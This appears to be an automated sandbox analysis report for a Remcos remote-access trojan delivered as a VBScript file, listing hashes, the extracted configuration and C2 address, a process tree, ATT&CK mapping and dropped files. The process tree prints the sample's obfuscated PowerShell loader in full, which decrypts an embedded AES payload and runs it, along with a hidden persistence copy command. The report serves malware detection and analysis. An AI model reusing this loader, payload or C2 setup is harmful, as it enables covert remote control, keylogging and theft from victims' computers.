remcos | 043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401

General

Target

envifa.vbs
Size

159KB
MD5

5b0011526c3005e35e88002cfcf3dff8
SHA1

5b0b70c2857e84d0abe2b04b0593ccfc49395a8f
SHA256

043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401
SHA512

4af5c688c4c971950724cd706d09d968973fc65f9b69bf5a969900771577b56799e33d3ca2dd0972ff78d06f4751d609711b19ee793c159189981ed07946d989
SSDEEP

3072:jk+jUIUfUPUgUgUgUgUgUgUgUgUgUgUgUgUgUgUgUgUVUPUdUgUgUgUgUgUgUgUo:XjUIUfUPUgUgUgUgUgUgUgUgUgUgUgUL

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

remccoss2023.duckdns.org:4576

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
registros.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-E5ZBB0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Capturas de pantalla
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

14 4344 powershell.exe
30 4344 powershell.exe

flow	pid	process
14	4344	powershell.exe
30	4344	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeRegAsm.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4344 set thread context of 868 4344 powershell.exe RegAsm.exe
Drops file in Windows directory 1 IoCs

Processes:

RegAsm.exe

description ioc process

File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

RegAsm.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\Local Settings RegAsm.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4344 powershell.exe
4344 powershell.exe
4816 powershell.exe
4816 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4344 powershell.exe
Token: SeDebugPrivilege 4816 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegAsm.exe

pid process

868 RegAsm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk	powershell.exe

description	pid	process	target process
PID 4344 set thread context of 868	4344	powershell.exe	RegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RegAsm.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\Local Settings	RegAsm.exe

pid	process
4344	powershell.exe
4344	powershell.exe
4816	powershell.exe
4816	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe

pid	process
868	RegAsm.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WScript.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 5056 wrote to memory of 4344	5056	WScript.exe	powershell.exe
PID 5056 wrote to memory of 4344	5056	WScript.exe	powershell.exe
PID 4344 wrote to memory of 4816	4344	powershell.exe	powershell.exe
PID 4344 wrote to memory of 4816	4344	powershell.exe	powershell.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 4344 wrote to memory of 868	4344	powershell.exe	RegAsm.exe
PID 868 wrote to memory of 4616	868	RegAsm.exe	WScript.exe
PID 868 wrote to memory of 4616	868	RegAsm.exe	WScript.exe
PID 868 wrote to memory of 4616	868	RegAsm.exe	WScript.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\duwaletpzfdpdcsfjjsxg.vbs"
4⤵
PID:4616

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\registros.dat
Filesize
144B

MD5
be710258455560d0ab88d15b88fce936

SHA1
8a6b3e951a3ae1d785ce550ec4439680a5b36ba9

SHA256
9fe151131910e5a84eed25ead81db9227e14cc8f7dd9359c8c7e7ecafacd4b38

SHA512
c73a26562bdbc5393f8d4691059b3fa0e5189f05ba989a7e9c9b458ec5dace531f659656eb584661c37e218d264d0518832b00fc36dcecb752ef17e1029552a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
69cf29b75442a46e0e7c3e91bbc375f2

SHA1
1c37e03a67e4bc203153a99d8eb9ed0b9390f7fa

SHA256
db131cefcdef09f02d903695b9ca29b408a699bab1f029bba0aa7473e87cfcd7

SHA512
508c07af418fcb9f12237d268825d93265a0d0c18f920551ba82be87609f58d6131b5861995793b8699d91c8cb49cee222f20e8f3ad83387e775828a75eab0eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdfvabhp.0ei.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\duwaletpzfdpdcsfjjsxg.vbs
Filesize
544B

MD5
4196262905f64f1dd00381f882d1e2c4

SHA1
325434edd2f6930f987de42e51228ca348745413

SHA256
0b3cbde8778e4f47322ca017b5280f6eed3cd6f327b436eea4e91fbeb364a092

SHA512
c3367ac15a473485aceafbe52aa591e33fb67dff21896b936173db78d2889f9ee200ce4b7d78ede67bc471433444dea1c4cb36013cda7f6f9f7df3416bb1aa73

Download Submit
memory/868-62-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-55-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-79-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-76-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-73-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-68-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-67-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-66-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-35-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-65-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-63-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-54-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-40-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-41-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-43-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-44-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-46-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-47-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-48-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-49-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-50-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/868-51-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4344-13-0x000001F5D9510000-0x000001F5D9CB6000-memory.dmp

Filesize
7.6MB

Download
memory/4344-39-0x00007FFEEB970000-0x00007FFEEC431000-memory.dmp

Filesize
10.8MB

Download
memory/4344-11-0x000001F5BE790000-0x000001F5BE7A0000-memory.dmp

Filesize
64KB

Download
memory/4344-0-0x000001F5D8820000-0x000001F5D8842000-memory.dmp

Filesize
136KB

Download
memory/4344-12-0x000001F5BE790000-0x000001F5BE7A0000-memory.dmp

Filesize
64KB

Download
memory/4344-15-0x000001F5D8D00000-0x000001F5D8D0C000-memory.dmp

Filesize
48KB

Download
memory/4344-17-0x000001F5D9330000-0x000001F5D934E000-memory.dmp

Filesize
120KB

Download
memory/4344-16-0x000001F5D9190000-0x000001F5D9206000-memory.dmp

Filesize
472KB

Download
memory/4344-10-0x00007FFEEB970000-0x00007FFEEC431000-memory.dmp

Filesize
10.8MB

Download
memory/4816-34-0x00007FFEEB970000-0x00007FFEEC431000-memory.dmp

Filesize
10.8MB

Download
memory/4816-29-0x000001D8171B0000-0x000001D8171C0000-memory.dmp

Filesize
64KB

Download
memory/4816-19-0x000001D8171B0000-0x000001D8171C0000-memory.dmp

Filesize
64KB

Download
memory/4816-18-0x00007FFEEB970000-0x00007FFEEC431000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing